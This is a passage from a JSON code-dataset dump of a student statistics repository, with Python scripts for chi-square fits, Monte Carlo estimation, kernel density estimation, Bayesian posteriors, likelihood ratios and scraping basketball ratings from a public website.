3')\nasdasd = np.arange(0, 22.1, 0.1)\nexpected_values = poisson.pmf(asdasd, data_2.x[0]) * len(z2)\nplt.close()\nprint(observed_values[observed_values != 0])\nprint(expected_values[expected_values != 0][:-1])\n\nmy_chi = chisquare(observed_values[observed_values != 0],\n f_exp=expected_values[expected_values != 0][1:])\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05,\n len(expected_values[expected_values != 0][1:]) - 
1))\n\nprint(len(expected_values[expected_values != 0][1:]) - 1, 'sdlkfnlsdknf')\n\nplt.hist(z2, bins=n_bins+0.05, label='Data Column 3')\nx = np.arange(0, len(expected_values[expected_values != 0][1:]), 1)\nfit1_label = ('Fit: Poisson distribution,\\n$\\mu$=%.02f, \\n$\\chi^2=%.02f$' %\n (data_2.x[0], my_chi[0]))\nplt.plot(x+1, expected_values[expected_values != 0][1:], 'ro', label=fit1_label)\nplt.legend()\nplt.savefig('prob1_Column3.pdf')\n\n# plt.show()\n\n\n###############################################################################\nprint('Data 1 starts here')\nplt.figure()\nbinwidth = 0.1\nn_bins = np.arange(min(z0), max(z0) + binwidth, binwidth)\n\n# Chi2 calculator\nobserved_values, bins, _ = plt.hist(z0, bins=n_bins)\n\nnormz = integrate.quad(f_8, 20, 27, args=(data_0.x[0], data_0.x[1], data_0.x[2]))\n# # We normalize by multiplyting the length of the data with the binwidth\nexpected_values = (f_8(bins[:-1], data_0.x[0], data_0.x[1], data_0.x[2]) / normz[0] *\n len(z0) * binwidth)\nplt.close()\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 3))\nprint(len(expected_values) - 3)\nplt.figure()\n\nplt.hist(z0, bins=n_bins, normed=True, label='Data Column 2')\nx = np.arange(20, 27, 0.01)\ny = f_8(x, data_0.x[0], data_0.x[1], data_0.x[2])/normz[0]\n\n\nfit1_label = ('Fit: $sin(ax)+ce^{bx}+1$,\\na=%.02f, b=%.02f, c=%.05f \\n$\\chi^2=%.02f$' %\n (data_0.x[0], data_0.x[1], data_0.x[2], my_chi[0]))\nplt.plot(x,y, color='r', label=fit1_label)\nplt.legend()\nplt.savefig('prob1_Column1.pdf')\n\n# plt.show()\n###############################################################################\nprint('Data 2 binom starts here')\nbinwidth = 0.1\nn_bins = np.arange(min(z2), max(z2) + binwidth, binwidth)\nobserved_values, bins, _ = plt.hist(z2, bins=n_bins, label='Data Column 3')\nasdasd = np.arange(0, 22.1, 0.1)\nexpected_values = binom.pmf(asdasd, 5000, data_3.x[0]) * len(z2)\nplt.close()\nprint(observed_values[observed_values != 0])\nprint(expected_values[expected_values != 0][:-1])\n\nmy_chi = chisquare(observed_values[observed_values != 0],\n f_exp=expected_values[expected_values != 0][1:])\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05,\n len(expected_values[expected_values != 0][1:]) - 1))" }, { "alpha_fraction": 0.561488687992096, "alphanum_fraction": 0.6051779985427856, "avg_line_length": 18.3125, "blob_id": "815a50f203fb0488bf24839ce02c1caa2722bd19", "content_id": "9f42073c5435ebd6f15b02ec533fde04a69c8d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 618, "license_type": "no_license", "max_line_length": 92, "num_lines": 32, "path": "/Week_2/Class_3/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef my_gauss(x, mu, sigma):\n result = 1/(np.sqrt(2 * np.pi * sigma ** 2)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\n return result\n\n\nmu = 0.2\nsigma = 0.1\nN = 50\n\ns = np.random.normal(mu, sigma, N)\n\nbinwidth = 0.01\n\nmu_scan = np.arange(0.05, 0.3 + binwidth, binwidth)\nsigma_scan = np.arange(0.05, 0.3 + binwidth, binwidth)\n\n\nLLH = np.zeros((len(mu_scan), len(sigma_scan)))\n\n\nfor i, mu in enumerate(mu_scan, 0):\n for j, sigma in enumerate(sigma_scan, 0):\n\n LLH[i, j] = np.sum(np.log(my_gauss(s, mu, sigma)))\n\n\nplt.imshow(LLH, 
cmap='hot')\nplt.show()\n" }, { "alpha_fraction": 0.5928629636764526, "alphanum_fraction": 0.6155717968940735, "avg_line_length": 25.80434799194336, "blob_id": "bd6f6ce2a6f5191b84602308eccf711709ff6e73", "content_id": "4826ec5c20523314bdf3c0c175dcc311df8f4d5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 81, "num_lines": 46, "path": "/Week_1/Class_2/mc_pi_centrallimit.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\n\nrandom.seed(142)\n\n# N is the number of throws per test\nN = 100\nnumber_of_tests = 10000\npi = np.empty((1, 0))\ncounter = 1\n# Fill my arrays with random numbers\nfor i in range(number_of_tests):\n\n x = np.empty((1, 0))\n y = np.empty((1, 0))\n x_missed = np.empty((1, 0))\n y_missed = np.empty((1, 0))\n\n for i in range(N):\n\n x_random = random.random()\n y_random = random.random()\n if (np.sqrt(x_random**2 + y_random**2)) < 1:\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n pi = np.append(pi, len(x) / N * 4)\n\nbinwidth = 0.1\nn_bins = np.arange(min(pi), max(pi) + binwidth, binwidth)\nplt.hist(pi, bins=n_bins, density='True')\n\nlnspc = np.linspace(min(pi), max(pi), len(pi))\n# lets try the normal distribution first\nm, s = stats.norm.fit(pi) # get mean and standard deviation\npdf_g = stats.norm.pdf(lnspc, m, s) # now get theoretical values in our interval\nplt.plot(lnspc, pdf_g, label=\"Norm\") # plot it\n\nprint(stats.chisquare(pi, f_exp=pdf_g))\n# plt.show()\n" }, { "alpha_fraction": 0.6515151262283325, "alphanum_fraction": 0.6767676472663879, "avg_line_length": 18.799999237060547, "blob_id": "12fffd253d25870449b4c02cc4d0a42bb4eaecc7", "content_id": "0e206ab302b5297277f26fed621d2f0422c2336b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 44, "num_lines": 20, "path": "/Week_1/Class_2/RNG.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# Initiate what seed i wanna use\nrandom.seed(142)\n\n# Create my empty arrays\nx = np.empty((1, 0))\ny = np.empty((1, 0))\n\n# Fill my arrays with random numbers\nfor i in range(100):\n x = np.append(x, random.random())\n y = np.append(y, random.random())\n\n# Plot the numbers\nplt.plot(x, y, marker='o', linestyle='None')\nplt.show()\n" }, { "alpha_fraction": 0.5858895778656006, "alphanum_fraction": 0.6411042809486389, "avg_line_length": 19.4375, "blob_id": "d85232d08e70a52a8c4d36e827cec29e2b6f2539", "content_id": "8ee9b78574ac42fdcda197c7a78b9746625ecd2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 326, "license_type": "no_license", "max_line_length": 49, "num_lines": 16, "path": "/AMAS_ProbSet2_NJT478/Code/Problem_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfrom scipy.stats import chi2\nimport numpy as np\n\ndf = 1\nx = np.linspace(0, 10, 1000)\ny = chi2.pdf(x, df)\n\nplt.style.use('bmh')\n\nplt.plot(x, y, label='$\\chi ^ 2$ pdf where df=1')\nplt.ylabel('$PDF$ $(\\chi ^ 
2$)')\nplt.xlabel('$\\chi ^ 2$')\nplt.legend()\nplt.savefig('Figure_1', dpi=200)\n# plt.show()" }, { "alpha_fraction": 0.4848708510398865, "alphanum_fraction": 0.5217711925506592, "avg_line_length": 19.223880767822266, "blob_id": "34c2fd61eec3d16ce1772f010acbbe0721232093", "content_id": "49ab68f65e5a41e9c3574c6661fd04c15d9101b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 92, "num_lines": 67, "path": "/Week_4/Class_8/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KernelDensity\n\n\ndef my_gauss(x, mu, sigma):\n result = 1/(np.sqrt(2 * np.pi * sigma ** 2)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\n return result\n\n\ndef my_kernel(data, x, h):\n\n kernels = np.array([])\n\n for k in x:\n temp = 0\n x_diff = 0\n\n for i in data:\n x_diff = (k - i) / h\n if abs(x_diff) < 1:\n temp += 1 / (2 * h)\n else:\n pass\n\n temp = temp / len(data)\n kernels = np.append(kernels, temp)\n\n return kernels\n\n\ndef my_kernel_gauss(data, x, h):\n\n kernels = np.array([])\n mu = 0\n sigma = 3\n\n for k in x:\n temp = 0\n x_diff = 0\n\n for i in data:\n x_diff = (k - i)\n temp += my_gauss(x_diff, mu, sigma)\n\n temp = temp / len(data)\n kernels = np.append(kernels, temp)\n\n return kernels\n\n\ndata = np.array([1, 2, 5, 6, 12, 15, 16, 16, 22, 22, 22, 23])\n\nh = 1.5\n\nx = np.linspace(-10, 35, 1000)\n\np = my_kernel(data, x, h)\np2 = my_kernel_gauss(data, x, h)\nkde = KernelDensity(kernel='gaussian', bandwidth=2 * h).fit(data[:, None])\np3 = np.exp(kde.score_samples(x[:, None]))\n\nplt.plot(x, p, label='Box')\nplt.plot(x, p2, label='Gauss_homemade')\nplt.plot(x, p3, label='KDE scipy')\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.5503565073013306, "alphanum_fraction": 0.5989304780960083, "avg_line_length": 25.0930233001709, "blob_id": "a3a9e7b7fbcc67a889b1f290d8c150a7556190c4", "content_id": "52ec172ac7df037663491e45cc4d57831b4c7231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2244, "license_type": "no_license", "max_line_length": 90, "num_lines": 86, "path": "/AMAS_ProbSet2_NJT478/Code/problem_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nimport random\n\nfname = 'ProblemSet2_Problem2.txt'\ndata = np.loadtxt(fname, skiprows=2)\n\nx_bottom_temp = data[0:12, 0]\ny_bottom_temp = data[0:12, 1]\n\nx_bottom_temp1 = data[37::, 0]\ny_bottom_temp1 = data[37::, 1]\n\nx_bottom = np.append(x_bottom_temp, x_bottom_temp1)\ny_bottom = np.append(y_bottom_temp, y_bottom_temp1)\n\nx_top = data[11:38, 0]\ny_top = data[11:38, 1]\n\nf_bottom = interpolate.interp1d(x_bottom, y_bottom)\nxnew = np.linspace(0.3, 1.7, 1000)\nynew = f_bottom(xnew)\n\n\nf_top = interpolate.interp1d(x_top, y_top)\nxnew_1 = np.linspace(0.3, 1.7, 1000)\nynew_1 = f_top(xnew_1)\n\n\n# N is the number of throws per test and A is area\nN = 100000\nnumber_of_tests = 1\nA = np.empty((1, 0))\n\n# Fill my arrays with random numbers\nfor i in range(number_of_tests):\n\n x = np.empty((1, 0))\n y = np.empty((1, 0))\n x_missed = np.empty((1, 0))\n y_missed = np.empty((1, 0))\n\n for i in range(N):\n\n x_random = random.uniform(0.3, 1.7)\n y_random = random.uniform(0.05, 0.35)\n if y_random < 
f_top(x_random):\n if y_random > f_bottom(x_random):\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n A = np.append(A, len(x) / N * 4 * 5.2 ** 2)\n\n\nplt.plot(x_top, y_top, 'k.')\nplt.plot(x_bottom, y_bottom, 'k.')\nplt.plot(xnew, ynew, 'k-')\nplt.plot(xnew_1, ynew_1, 'k-')\nplt.plot(x, y, color='silver', marker='.', linestyle='None', markersize=2, label='Accept')\nplt.plot(x_missed, y_missed, color='black', linestyle='None', marker='.',\n markersize=2, label='Reject')\nplt.title('Monte Carlo Area')\nplt.legend(bbox_to_anchor=(0,1.0,1,0.2), loc=\"lower left\")\nplt.savefig('batman_logo.png', dpi=200)\n# plt.show()\n\n# Area \nA = (1.7 - 0.3) * (0.35 - 0.05)\nprint(\"Area: %.2f\" % (A))\n\n# Probality of hitting inside batman logo\np = len(x) / N\n\nprint(\"Probality hitting inside: %.2f%%\" % (p))\n\n# Area of logo\nA_logo = A * p\nprint(\"Area: %.4f\" % (A_logo))\n" }, { "alpha_fraction": 0.5099278092384338, "alphanum_fraction": 0.6281588673591614, "avg_line_length": 24.76744270324707, "blob_id": "e1da513abf89008e3798d9a1da7af0752e239dc0", "content_id": "0ea6ca0fb05f3b8db8c34f37488a371a6379f2d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 78, "num_lines": 43, "path": "/Problem_set_2/problem_3.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\ndef p_Ai_D(produced, defective):\n p_D = np.sum(produced * defective)\n p_Ai_D = (defective * produced / p_D) * 100\n return p_Ai_D\n\n\n# Total produced in percentage\nproduced = np.array([35, 15, 5, 20, 25]) / 100\n# Defective units in percentage\ndefective = np.array([2, 4, 10, 3.5, 3.1]) / 100\nprint(produced * defective * 100)\n\n# Bayes: Probablity that defective unit came from A_i facility\nprint(p_Ai_D(produced, defective))\n\n\n# print('Probablity device comes from A_2 give its defective %.2f' % (p_A2_D))\n\ntemp = defective * produced\ntemp_max = max(temp)\ntemp_index = np.argmax(temp)\n\nnew_defective = temp_max / produced\nprint(new_defective * 100)\n\n\n########\n\nproduced = np.array([0.27, 0.1, 0.05, 0.08, 0.25, 0.033, 0.019, 0.085,\n 0.033, 0.02, 0.015, 0.022, 0.015, 0.008])\n\ndefective = np.array([0.02, 0.04, 0.1, 0.035, 0.022, 0.092, 0.12, 0.07,\n 0.11, 0.02, 0.07, 0.06, 0.099, 0.082])\n\ntemp = defective * produced\ntemp_max = max(temp)\ntemp_index = np.argmax(temp)\n\nnew_defective = temp_max / produced\nprint(np.round(new_defective, 3) )\n" }, { "alpha_fraction": 0.5746117234230042, "alphanum_fraction": 0.6225523352622986, "avg_line_length": 29.85416603088379, "blob_id": "82d66adf6c935559445c2a8acef67cc6b96556d2", "content_id": "071f96d79e50b984a94660fa4a17b84875b78da5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1481, "license_type": "no_license", "max_line_length": 101, "num_lines": 48, "path": "/Exam_2019/Code/Problem_3.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.stats import chisquare, chi2, binom, beta\nfrom scipy import integrate\nfrom scipy.optimize import minimize\n\nplt.style.use('bmh')\n\nfname = 'Exam_2019_Problem3a.txt'\ndata = 
np.loadtxt(fname)\n\nsorted_data = np.sort(data)\nindex = len(sorted_data)*(1-0.0455)\n\nprint(sorted_data[math.ceil(index)])\n\n\nbinwidth = 0.8\nn_bins = np.arange(0, max(data) + binwidth, binwidth)\nplt.hist(data, bins=n_bins, density=True)\n\nprint('Threshold value ', chi2.isf(0.0455, 5))\nplt.close()\n###############################################################################\na = 89\nb = 45\n\n\nn = 5\nk = 2\np = np.arange(0, 1.001, 0.001)\n\nnormz1 = integrate.quad(lambda p: binom.pmf(k, n, p), 0, 1)[0]\nnormz2 = integrate.quad(lambda p: beta.pdf(p, a, b), 0, 1)[0]\nnormz3 = integrate.quad(lambda p: beta.pdf(p, a, b) * binom.pmf(k, n, p), 0, 1)[0]\nestimate = integrate.quad(lambda p: p*beta.pdf(p, a, b) * binom.pmf(k, n, p) / normz3, 0, 1)[0]\nestimate2 = integrate.quad(lambda p: p**2 * beta.pdf(p, a, b) * binom.pmf(k, n, p) / normz3, 0, 1)[0]\n\nplt.plot(p, beta.pdf(p, a, b) / normz2, 'k', label='prior')\nplt.plot(p, binom.pmf(k, n, p) / normz1 , 'b', label='likelihood')\nplt.plot(p, beta.pdf(p, a, b) * binom.pmf(k, n, p) / normz3, 'r', label='posterior')\nplt.legend()\nplt.show()\n\nprint('likelihood at 0.35 ', binom.pmf(k, n, 0.35) / normz1)\nprint('uncertainty ', np.sqrt(estimate2 - estimate ** 2))\nprint('Mean of posterior: ', estimate )\n" }, { "alpha_fraction": 0.50722736120224, "alphanum_fraction": 0.5427069664001465, "avg_line_length": 23.815217971801758, "blob_id": "0466014a0478a729cae862cdfbfe58f3226df046", "content_id": "3e6c9616b34d00be127c5f403f401bbf71014998", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2283, "license_type": "no_license", "max_line_length": 79, "num_lines": 92, "path": "/Week_4/Class_7/exercise_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import chisquare\n\n\nfname = 'Lecture8_LLH_Ratio_2_data.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx_1 = loaded_file[:, 0]\n\nfname = 'Lecture8_LLH_Ratio_2a_data.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx_2 = loaded_file[:, 0]\n\n\ndef norm(x, alpha, beta):\n upper_lim = (max(x) + 1 / 2 * alpha * (max(x) ** 2) +\n 1 / 3 * beta * (max(x) ** 3))\n lower_lim = (min(x) + 1 / 2 * alpha * (min(x) ** 2) +\n 1 / 3 * beta * (min(x) ** 3))\n\n integral = upper_lim - lower_lim\n return integral\n\n\ndef norm_alternate(x, alpha, beta, gamma):\n upper_lim = (max(x) +\n 1 / 2 * alpha * (max(x) ** 2) +\n 1 / 3 * beta * (max(x) ** 3) -\n 1 / 6 * gamma * (max(x) ** 6))\n lower_lim = (min(x) +\n 1 / 2 * alpha * (min(x) ** 2) +\n 1 / 3 * beta * (min(x) ** 3) -\n 1 / 6 * gamma * (min(x) ** 6))\n\n integral = upper_lim - lower_lim\n return integral\n\n\ndef my_func(x, alpha, beta):\n return (1 + alpha * x + beta * x ** 2) / norm(x, alpha, beta)\n\n\ndef my_func_alternate(x, alpha, beta, gamma):\n return ((1 + alpha * x + beta * x ** 2 - gamma * x ** 5) /\n norm_alternate(x, alpha, beta, gamma))\n\n\nbinwidth = 0.05\nn_bins = np.arange(min(x_1), max(x_1) + binwidth, binwidth)\ny, x, _ = plt.hist(x_1, bins=n_bins, normed=1)\n\nx = x + binwidth / 2\n\npopt, pcov = curve_fit(my_func, x[0:-1], y)\n\nplt.plot(x, my_func(x, *popt), 'r--',\n label='fit: a=%5.3f, b=%5.3f' % tuple(popt))\n\nplt.plot(x[0:-1], y, linestyle='none', marker='.')\n\n\nprint(chisquare(y, my_func(x[0:-1], *popt), ddof=len(y)-2))\n\nLLH = np.sum(np.log(my_func(x_1, *popt)))\n\nprint(LLH)\n\n#####\n\npopt_alternate, pcov = 
curve_fit(my_func_alternate, x[0:-1], y)\n\nplt.plot(x, my_func_alternate(x, *popt_alternate), 'b--',\n label='fit: a=%5.3f, b=%5.3f, g=%5.3f' % tuple(popt_alternate))\n\nplt.plot(x[0:-1], y, linestyle='none', marker='.')\nplt.legend()\nplt.show()\n\n\nprint(chisquare(y, my_func_alternate(x[0:-1], *popt_alternate), ddof=len(y)-2))\n\nLLH1 = np.sum(np.log(my_func_alternate(x_1, *popt_alternate)))\n\nprint(LLH1)\n\nLLH_ratio = -2 * (LLH - LLH1)\nprint('Likelyhood Ratio', LLH_ratio)\n" }, { "alpha_fraction": 0.8461538553237915, "alphanum_fraction": 0.8461538553237915, "avg_line_length": 51, "blob_id": "d708f1b68d9c14d16cabe63f12cc72c820af7cd2", "content_id": "645b56797734d475e3984bb0636f1444e57eb75c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 51, "num_lines": 1, "path": "/Project/readme.md", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "#Project for advanced methods in applied statistics\n" }, { "alpha_fraction": 0.5718390941619873, "alphanum_fraction": 0.6005747318267822, "avg_line_length": 18.33333396911621, "blob_id": "ab71a1b536e1e59172b27ef029b574ac46412f24", "content_id": "afa7a75768b531875d24b903fea0f142a2318c4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 348, "license_type": "no_license", "max_line_length": 59, "num_lines": 18, "path": "/Week_5/Class_9/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\nsigma = 1\n\nfor i in np.arange(0, 11, 0.05):\n mu = i\n s = np.random.normal(mu, sigma, 100)\n\n percentile = s[(s >= (i - sigma)) & (s <= (i + sigma))]\n x = np.ones(len(percentile)) * i\n\n plt.plot(x, percentile, 'r')\n\nplt.xlabel('True Value')\nplt.ylabel('Observed Values')\nplt.show()\n" }, { "alpha_fraction": 0.5231537222862244, "alphanum_fraction": 0.6239023804664612, "avg_line_length": 40.61153793334961, "blob_id": "889754d1088a96db6fc7bddc2a4b92ae6a12fa27", "content_id": "ee7ad823de63207efa432e4475a3fd2791062536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10819, "license_type": "no_license", "max_line_length": 137, "num_lines": 260, "path": "/Problem_set_1/problem_set_4.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.style.use('bmh')\n\n### Getting 2014 data\nmy_url = 'https://kenpom.com/index.php?y=2014'\nmy_page = requests.get(my_url)\n\nsoup = BeautifulSoup(my_page.text, 'html.parser')\n\nratings_table = soup.find(id='ratings-table')\n\nheaders = ratings_table.find(class_='thead2')\n\ntitles = headers.find_all('th')\n\nheader_titles = []\n\nfor title in titles:\n try:\n header_titles.append(title.contents[0].contents[0])\n except:\n header_titles.append(title.contents[0])\n\nprint(header_titles)\n\nbody = ratings_table.find_all('tbody')\nrows = body[0].find_all('tr')\n\nconferences = ['ACC', 'SEC', 'B10', 'BSky', 'A10', 'BE']\nACC_teams_2014 = np.array([])\nSEC_teams_2014 = np.array([])\nB10_teams_2014 = np.array([])\nBSky_teams_2014 = np.array([])\nA10_teams_2014 = np.array([])\nBE_teams_2014 = np.array([])\nrest_teams_2014 = np.array([])\n\nACC_AdjO_2014 = np.array([])\nSEC_AdjO_2014 = 
np.array([])\nB10_AdjO_2014 = np.array([])\nBSky_AdjO_2014 = np.array([])\nA10_AdjO_2014 = np.array([])\nBE_AdjO_2014 = np.array([])\nrest_AdjO_2014 = np.array([])\n\n\nfor row in rows:\n temp = row.find_all('td')\n if len(temp) == 0:\n pass\n else:\n if temp[2].contents[0].contents[0] in conferences:\n if str(temp[2].contents[0].contents[0]) == 'ACC':\n ACC_teams_2014 = np.append(ACC_teams_2014, temp[1].contents[0].contents[0])\n ACC_AdjO_2014 = np.append(ACC_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'SEC':\n SEC_teams_2014 = np.append(SEC_teams_2014, temp[1].contents[0].contents[0])\n SEC_AdjO_2014 = np.append(SEC_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'B10':\n B10_teams_2014 = np.append(B10_teams_2014, temp[1].contents[0].contents[0])\n B10_AdjO_2014 = np.append(B10_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BSky':\n BSky_teams_2014 = np.append(BSky_teams_2014, temp[1].contents[0].contents[0])\n BSky_AdjO_2014 = np.append(BSky_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'A10':\n A10_teams_2014 = np.append(A10_teams_2014, temp[1].contents[0].contents[0])\n A10_AdjO_2014 = np.append(A10_AdjO_2014, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BE':\n BE_teams_2014 = np.append(BE_teams_2014, temp[1].contents[0].contents[0])\n BE_AdjO_2014 = np.append(BE_AdjO_2014, float(temp[5].contents[0]))\n else:\n rest_teams_2014 = np.append(rest_teams_2014, temp[1].contents[0].contents[0])\n rest_AdjO_2014 = np.append(rest_AdjO_2014, float(temp[5].contents[0]))\n\n###### Getting 2009 data\nmy_url = 'https://kenpom.com/index.php?y=2009'\nmy_page = requests.get(my_url)\n\nsoup = BeautifulSoup(my_page.text, 'html.parser')\nratings_table = soup.find(id='ratings-table')\n\nbody = ratings_table.find_all('tbody')\nrows = body[0].find_all('tr')\n\nACC_teams_2009 = np.array([])\nSEC_teams_2009 = np.array([])\nB10_teams_2009 = np.array([])\nBSky_teams_2009 = np.array([])\nA10_teams_2009 = np.array([])\nBE_teams_2009 = np.array([])\nrest_teams_2009 = np.array([])\n\nACC_AdjO_2009 = np.array([])\nSEC_AdjO_2009 = np.array([])\nB10_AdjO_2009 = np.array([])\nBSky_AdjO_2009 = np.array([])\nA10_AdjO_2009 = np.array([])\nBE_AdjO_2009 = np.array([])\nrest_AdjO_2009 = np.array([])\n\nfor row in rows:\n temp = row.find_all('td')\n if len(temp) == 0:\n pass\n else:\n if temp[2].contents[0].contents[0] in conferences:\n if str(temp[2].contents[0].contents[0]) == 'ACC':\n ACC_teams_2009 = np.append(ACC_teams_2009, temp[1].contents[0].contents[0])\n ACC_AdjO_2009 = np.append(ACC_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'SEC':\n SEC_teams_2009 = np.append(SEC_teams_2009, temp[1].contents[0].contents[0])\n SEC_AdjO_2009 = np.append(SEC_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'B10':\n B10_teams_2009 = np.append(B10_teams_2009, temp[1].contents[0].contents[0])\n B10_AdjO_2009 = np.append(B10_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BSky':\n BSky_teams_2009 = np.append(BSky_teams_2009, temp[1].contents[0].contents[0])\n BSky_AdjO_2009 = np.append(BSky_AdjO_2009, float(temp[5].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'A10':\n A10_teams_2009 = np.append(A10_teams_2009, temp[1].contents[0].contents[0])\n A10_AdjO_2009 = np.append(A10_AdjO_2009, float(temp[5].contents[0]))\n 
elif str(temp[2].contents[0].contents[0]) == 'BE':\n BE_teams_2009 = np.append(BE_teams_2009, temp[1].contents[0].contents[0])\n BE_AdjO_2009 = np.append(BE_AdjO_2009, float(temp[5].contents[0]))\n else:\n rest_teams_2009 = np.append(rest_teams_2009, temp[1].contents[0].contents[0])\n rest_AdjO_2009 = np.append(rest_AdjO_2009, float(temp[5].contents[0]))\n\ndiff_ACC_teams = np.array([])\ndiff_ACC_AdjO = np.array([])\nACC_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(ACC_teams_2014, 0):\n for j, team_2009 in enumerate(ACC_teams_2009, 0):\n if team_2014 == team_2009:\n diff_ACC_teams = np.append(diff_ACC_teams, team_2014)\n ACC_Adjo_2009_value = np.append(ACC_Adjo_2009_value, ACC_AdjO_2009[j])\n diff_ACC_AdjO = np.append(diff_ACC_AdjO, ACC_AdjO_2014[i] - ACC_AdjO_2009[j])\n\ndiff_SEC_teams = np.array([])\ndiff_SEC_AdjO = np.array([])\nSEC_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(SEC_teams_2014, 0):\n for j, team_2009 in enumerate(SEC_teams_2009, 0):\n if team_2014 == team_2009:\n diff_SEC_teams = np.append(diff_SEC_teams, team_2014)\n SEC_Adjo_2009_value = np.append(SEC_Adjo_2009_value, SEC_AdjO_2009[j])\n diff_SEC_AdjO = np.append(diff_SEC_AdjO, SEC_AdjO_2014[i] - SEC_AdjO_2009[j])\n\ndiff_B10_teams = np.array([])\ndiff_B10_AdjO = np.array([])\nB10_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(B10_teams_2014, 0):\n for j, team_2009 in enumerate(B10_teams_2009, 0):\n if team_2014 == team_2009:\n diff_B10_teams = np.append(diff_B10_teams, team_2014)\n B10_Adjo_2009_value = np.append(B10_Adjo_2009_value, B10_AdjO_2009[j])\n diff_B10_AdjO = np.append(diff_B10_AdjO, B10_AdjO_2014[i] - B10_AdjO_2009[j])\n\ndiff_BSky_teams = np.array([])\ndiff_BSky_AdjO = np.array([])\nBSky_Adjo_2009_value = np.array([])\n\nfor i, team_2014 in enumerate(BSky_teams_2014, 0):\n for j, team_2009 in enumerate(BSky_teams_2009, 0):\n if team_2014 == team_2009:\n diff_BSky_teams = np.append(diff_BSky_teams, team_2014)\n BSky_Adjo_2009_value = np.append(BSky_Adjo_2009_value, BSky_AdjO_2009[j])\n diff_BSky_AdjO = np.append(diff_BSky_AdjO, BSky_AdjO_2014[i] - BSky_AdjO_2009[j])\n\ndiff_A10_teams = 